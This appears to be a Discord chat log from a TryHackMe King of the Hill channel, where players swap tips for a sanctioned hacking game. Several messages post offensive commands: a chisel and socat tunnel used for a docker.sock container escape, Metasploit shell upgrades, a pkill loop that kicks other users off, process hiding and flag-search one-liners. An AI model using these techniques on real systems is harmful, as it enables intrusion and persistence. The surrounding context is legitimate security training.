isnt it kind of lame if premium users can select the desired machine..?
There's not enough machines for it to matter enough
opal dove
I dont know how big the machine pool is though
not big enough unfortunately
even if people don't have an autopwn it only takes a few games and very basic notes to be able to pwn most of the machines before your opponents' nmap scans finish
nova tide
even if people don't have an autopwn it only takes a few games and very basic no...
try hogwarts
graceful oriole
Anyone playing?
opal dove
*try hogwarts*
just rustscan then the usual really
nova tide
just rustscan then the usual really
goodluck
kindred prairie
*try hogwarts*
hardest linux box for me 
bright geyser
Attacking others isn't allowed even in these situations? 😂
nova tide
Attacking others isn't allowed even in these situations? 😂
Seems like they have changed the flags, you can report them at koth@tryhackme.com
earnest folio
Hello, I never tried koth. I'm pretty sure I would manage to find vulns and exploit them but I wouldn't know where to start to patch them ^^ any advice ? Or maybe I should go through Blue team path ?
nova tide
Hello, I never tried koth. I'm pretty sure I would manage to find vulns and expl...
!docs koth
pearl gladeBOT
TryHackMe
nova tide
This one to be exact: https://help.tryhackme.com/king-of-the-hill
earnest folio
This one to be exact: <https://help.tryhackme.com/king-of-the-hill>
Thank you, I found the blog post with tips and tricks
sour vectorBOT
Gave +1 Rep to @nova tide
wicked shard
send me @pliant rapids
ebon lichen
Time for a little break from KotH! Playing KotH has been extremely educational, even therapeutic at times, during this Covid-19 ordeal 😉 Just wanted to say thanks to all. This community is pretty awesome and that is because of all of you!
quartz valley
Can anyone suggest me which linux machine is good for beginners to play KOTH?
probably the easiest of all to begin with
brazen cloud
Space Jam is pretty beginner friendly and linux @quartz valley
fair adder
i'm playing it now
quartz valley
Space Jam is pretty beginner friendly and linux <@!365852436960772097>
Thanks Ben, will try that today.
sour vectorBOT
Gave +1 Rep to @brazen cloud
brazen cloud
Thanks Ben, will try that today.
best of luck (:
fair adder
Can anyone help me to make some tests? i just need someone to enter this room here, it needs two people to start https://tryhackme.com/games/koth/39109
stiff egret
- You need to paste the invite link, top right, options you'll know when you see it
bleak briar
https://tryhackme.com/games/koth/join/5c2884c536d8d9ecf90f9437 Public, starts in 17mins, only me and 1 other player atm
6m30s!
stiff egret
- Naughty nub
quiet schooner
Can anyone suggest me which linux machine is good for beginners to play KOTH?
p...
Food is available standalone to practice, and is also quite easy
Especially as more CVEs have come out that affect the boxes, particularly privilege escalation
fair adder
Especially as more CVEs have come out that affect the boxes, particularly privil...
Oh wow I was gonna ask if y'all patched it but RIP
quiet schooner
Oh wow I was gonna ask if y'all patched it but RIP
I can't speak for the other box creators
I also can't speak for THM as a whole
fair adder
🤷♂️
bright geyser
if anyone wants to join a public Koth it will start in 7minutes 😁
steep agate
"fair few games"
👀
🤣 🤣 🤣
prisma roost
just saw that you're the guy at number 2, welcome back 🙂
steep agate
Thanks
i was in koth but i had to leave, i have to tidy my bookshelf
there are these books and several others on physics, chemistry, harry potter, among others
@prisma roost
prisma roost
yeh man, had my exams last month so couldn't do thm and ... well it sucked
steep agate
end and beginning of the year and always very busy
nova tide
@stiff egret
stiff egret
<@!580609268261191680>
ah, big fan of books in general, got a fair collection myself. Always nice to see people reading novels
steep agate
ah, big fan of books in general, got a fair collection myself. Always nice to se...
I love reading books as much as harry potter, sherlock, among many others
stiff egret
Very very nice to hear! I've been reading The Silent patient recently, would recc def.
steep agate
I've never heard of this book before, I'll check it out later.
stiff egret
steep agate
I think here in Brazil they don't have this book, in pt-br
stiff egret
Ah, yeah, I see you are reading translated versions of them?
steep agate
yes, they are translated books
nova tide
cool keyboard 😄
stiff egret
yes, they are translated books
Well, if you decide to try en- books, then it's one worthy piece
stiff egret
cool keyboard 😄
MAWTERIAL GURL
prisma roost
are those... passwords written on notes?
steep agate
Well, if you decide to try en- books, then it's one worthy piece
It's a good idea
English books I read more when it has something to do with hacking
stiff egret
are those... passwords written on notes?
I'll just say that I am glad over my camera quality.
steep agate
I'm going to record a video of shell x shell techniques that can also be set useful in a koth
final nest
@royal pilot u there mate ?
fair adder
:>
gritty stirrup
mighty spoke
any idea how to change the permission?
prisma roost
any idea how to change the permission?
google icacls
or if you want the easy win
just del king.txt and echo username > king.txt
mighty spoke
google `icacls`
thanks ❤️🔥
sour vectorBOT
Gave +1 Rep to @prisma roost
mighty spoke
or if you want the easy win
won
fair adder
any idea how to change the permission?
bruh use shell_to_meterpreter 🙂
steep agate
any idea how to change the permission?
attrib -R king.txt
prisma roost
infloop is typing
placid fable
Here's that earlier post @prisma roost
# on your system
# start the chisel server
chisel server -R -p 3000
# on target machine
# get a port to communicate with the socket file
socat tcp-l:3275,fork,reuseaddr unix-connect:/var/run/docker.sock &!
# connect to the chisel server
chisel client <your-IP>:<port> R:3275:localhost:3275
# on your system
# use docker
docker -H :3275 ...
I have written these from mere memory, so beware of any incorrect flags 😅
That's how I go with koth-H1:Hard machine (one of the 4 containers), getting that port on my system with chisel following a simple docker escape
sour vectorBOT
Gave +1 Rep to @placid fable
placid fable
Learnt a lot from wreath🙂
prisma roost
Yeh, didn't know much about tunnelling before wreath as well
mighty spoke
bruh use shell_to_meterpreter 🙂
How am I supposed to do that?
placid fable
That's one for the notes! <:happyPanda:823720553550315604>
I won't be amazed if there's a static binary for docker
Edit: There is, https://download.docker.com/linux/static/stable/x86_64/
prisma roost
What's the last line docker -H :3275 doing
Haven't you forwarded the port to your local machine already?
placid fable
How am I supposed to do that?
Within msfconsole, use Ctrl-Z to background the plain shell
And try the following -
use post/multi/manage/shell_to_meterpreter
set SESSION <session-id>
run
I exploited the machine using a python script
placid fable
What's the last line `docker -H :3275` doing
Haven't you forwarded the port to y...
By default it uses the /var/run/docker.sock on your system
So to use a custom one, that too on another machine, I got a local port to use it with
docker -H localhost:3275 that's what we have started locally from the chisel client
prisma roost
Within `msfconsole`, use `Ctrl-Z` to background the plain shell
And try the foll...
I just setup payload windows meterpreter but ig it'd depend on the type of shell you're getting back
prisma roost
By default it uses the `/var/run/docker.sock` on your system
So to use a custom ...
I see, nice trick with docker and chisel,
fair adder
rugged leaf
E get one guy wey be jcoscia for here, If i sabi your papa..... Na amadioha go settle our fight, You too dey bully for KOTH, ah!
limber rune
Ok wtf is “jcoscia”?????
I know you are trying to prestige but it’s ruining the fun for others
molten mason
I know you are trying to prestige but it’s ruining the fun for others
By playing the boxes? I leave most things unpatched...
limber rune
By playing the boxes? I leave most things unpatched...
But u change the ssh passwords?
molten mason
But u change the ssh passwords?
Of course, changing creds is the easiest way to keep people out. You may want to give https://tryhackme.com/resources/blog/guide-to-king-of-the-hill a read
There's always more than one way into a box...
(and you can get there first and do it yourself)
limber rune
There's always more than one way into a box...
You have a good point I have no more excuses/defenses therefore I am concluding to defeat
- Defeated male leaves *
steep agate
But u change the ssh passwords?
lol man, you can change ssh keys yes, there are several ways for you to invade the machine...
limber rune
lol man, you can change ssh keys yes, there are several ways for you to invade t...
Lmaoooo yeah, that’s why I self deleted
Defeated*
steep agate
@limber rune what box?
limber rune
<@802374933207842856> what box?
It was panda I think
steep agate
LOL
limber rune
Ikrrrrrr
steep agate
man this box has more than 1 way to invade, just try to find others
steep agate
I understand
limber rune
Thank you for your understanding
steep agate
:)
limber rune
- defeated male leaves *
steep agate
could release more koth machines
limber rune
Could
steep agate
I'm going to record a video of shell x shell techniques that can also be set useful in a koth
steep agate
for example hide a pid without hooking
limber rune
Yeaaaahhhh
limber rune
for example hide a pid without hooking
To prevent being kicked off a machine?
steep agate
yes I will, and why these last few days are running for me
limber rune
Noice!
steep agate
To prevent being kicked off a machine?
Yes
limber rune
yes I will, and why these last few days are running for me
Can u send me link to the video or write up if u make it?
steep agate
if the enemy doesn't know your PID/PTS, there's no way he can kick you out of the machine, unless he takes permissions from a binary (but that's against the rules, changing binaries, except chattr )
steep agate
I will still post on my youtube channel in the future, now it's too busy for me
steep agate
Thats definitely gotta be useful
Yeah
limber rune
Cause the second I got into panda, I got kicked off by jcoscia
limber rune
I will still post on my youtube channel in the future, now it's too busy for me
Alright bet
steep agate
did you log in with ssh? he could use a ps aux | grep pts, or w, and see your pts, and kick you out of the machine, so it saves time changing the password
steep agate
I did login w ssh
so he should be waiting for you to kick you out
limber rune
so he should be waiting for you to kick you out
Probably
@molten mason what level are you actually?
Or maybe their just good at the game
Lmaoooooo
steep agate
probably he had some automated script in bash, or even oneline, to get you off the machine, this is relatively easy to do, for example: while true; do pkill -t -9 pts/#; done
molten mason
I'm not scripting anything, I just watch closely for shells and check logs
and I'm 0x2 but just enjoy koth
limber rune
Dang ok ok
limber rune
probably he had some automated script in bash, or even oneline, to get you off t...
Can you also background it using the “&” so you can hunt for flags as well?
steep agate
I'm not scripting anything, I just watch closely for shells and check logs
I also like to see the logs, but I'm invisible, so no one knows I'm on the machine
limber rune
steep agate
Can you also background it using the “&” so you can hunt for flags as well?
you could use things like: grep -rli thm{ / 2>/dev/null
limber rune
Ooooohh
steep agate
find / -name flag* 2>/dev/null
etc
there are a lot of cool things to do in a machine instead of kicking others
limber rune
find / -name flag* 2>/dev/null
That’s the one I usually use
limber rune
there are a lot of cool things to do in a machine instead of kicking others
AGREED
steep agate
That’s the one I usually use
I'ts very interesting
steep agate
:)
Anyway, I'm going out here, I'm going to finish doing things here at home, see you later!
limber rune
Bye!
steep agate
Bye!
idle void
@molten masonDo you ever sleep?
molten mason
Sleep is just caffeine deficiency.
nova tide
sleep for weak
molten mason
prisma roost
just repeat the cycle again :)
nova tide
they can't reset the box if you reset it first
stiff egret
*they can't reset the box if you reset it first*
THE REAL LEGEND.
idle void
@molten masonHow long have you been doing cyber security?
molten mason
<@!940737240575926322>How long have you been doing cyber security?
I've been interested in security since I was a teen, but I haven't actually worked in the field yet (working on that lol)
idle void
I've been interested in security since I was a teen, but I haven't actually work...
Ah fair. Seems like there'll be no issue with that
stiff egret
Long time, totally rusty, let's goooo
ah shit, Hogwarts again, I hate this machine.
prisma roost
stiff egret
next level patching going on..
idle void
jcoscia is very good. Props to them
stiff egret
now I remember why I hated Hogwarts
stiff egret
jcoscia is very good. Props to them
most def, from what I can see, good by the rules patching.
prisma roost
almost all ports moved up 😄
stiff egret
shut up naughty
prisma roost
ironic when the writer fails to break it
stiff egret
dude you have no idea how proud I am of that poem, that's original content yk
can't believe just lost in the box I created, I need to get back in the game
placid fable
~~can't believe just lost in the box I created, I need to get back in the game~~
I hope, I didn't break any rules 😄
All services are running, some even patched 🤔
stiff egret
most def, from what I can see, good by the rules patching.
Told you no? Nice patching (:
placid fable
I had parrot and nyancat prepared for you guys 😅
prisma roost
stiff egret
It was fun,I haven't given up yet, but really fun playing after a long time
placid fable
There is this line from netstat -plant
tcp 0 1 10.10.76.19:54054 34.253.229.19:80 SYN_SENT 17670/http
How is there 34.253...?
stiff egret
Interesting
placid fable
There is this line from `netstat -plant`
`tcp 0 1 10.10.76.19:54054 ...
That one is - ec2-34-241-117-189.eu-west-1.compute.amazonaws.com
There's now another one 91.189.88.152 - actiontoad.canonical.com 😅
Anyways
stiff egret
Whoever patched it, kudos, everyone this is how you play king of the hill.
brazen cloud
Hehehe that is awesome
steep agate
Famous nyancat
stiff egret
Hehehe that is awesome
Ikr, was super impressed by the patching ngl.
Not the methods, I mean by the book someone would argue to actually fix the php code, but it was just cooler xD
prisma roost
rugged leaf
@molten mason Brother, you gave me and my frens here some troubles but you played well.... Respect man
rugged leaf
Ikr, was super impressed by the patching ngl.
Hi sir, create more machine.... some are using the familiar advantage😂
stiff egret
why you attack me like that?
mighty spoke
What can I do if someone uses chattr on king.txt & remove chattr?
nova tide
you can upload your own chattr binary. You can find it from busybox
mighty spoke
I did that , but it says something is not matching
nova tide
You need to upload a static binary not the one from your machine.
mighty spoke
Oww.. how can I do that?
nova tide
google busybox binaries.
mighty spoke
Ok
stiff egret
Check pins
molten mason
Is it allowed to run a honeypot, and run the real service (Ex. sshd) on another port? Asking for a friend.
stiff egret
As long as the real ssh is on, I don't see any problem.
molten mason
Okay, thanks! >:)
paper widget
Hi, I just wonder when do I get access to koth or more how do I get access. Cause I get the notification that says only intermediate or experience members. When do I become that?
molten mason
Hi, I just wonder when do I get access to koth or more how do I get access. Caus...
You can set that at https://tryhackme.com/profile -> About you -> scroll to bottom
placid imp
are we allowed to change ssh ports?
placid fable
are we allowed to change ssh ports?
Yes
placid imp
thank you
steep agate
are we allowed to change ssh ports?
no, in the rules it says that it is forbidden to change the ssh ports
placid fable
no, in the rules it says that it is forbidden to change the ssh ports
# Rule 2 - KoTH
Only stop a service if it can't be patched any other way. Services should remain available for “genuine users of the box” if at all possible. Changing ports of services is allowed. (Try to keep the machines in as original state as possible.)
oh yeah, didn't know
😅
wind fjord
If you go into the discord search and search “from:Naughty in:koth new”, you’ll see what happens every time this question is asked 
formal sable
Can anyone offer me a tip on the shrek room's shrek is like an onion flag? It looks like base64 but once decoded I don't recognise it as anything. There seems to be a mixture of hex characters and other stuff. I've played around with it quite a bit but not cracked it. I'd love a hint please.
fair adder
Have you ever seen shrek?
fair adder
Can anyone offer me a tip on the shrek room's `shrek is like an onion` flag? It ...
That was to you.
molten mason
Can anyone offer me a tip on the shrek room's `shrek is like an onion` flag? It ...
I'm going to go out on a limb here and assume it has layers.
formal sable
That was to you.
Thanks, yes a while back, but not so I remember any clues from the dialogue. I was expecting to need to apply multiple decodes to it, but I'm failing to see what the next one might be. Is there something more specific about the reference to layers?
sour vectorBOT
Gave +1 Rep to @tardy sand
bright geyser
Thanks, yes a while back, but not so I remember any clues from the dialogue. I w...
There was a git repo with a python script that you put a string and the script will tell you what is
I don't remember the name, when I'll get home I'll tell you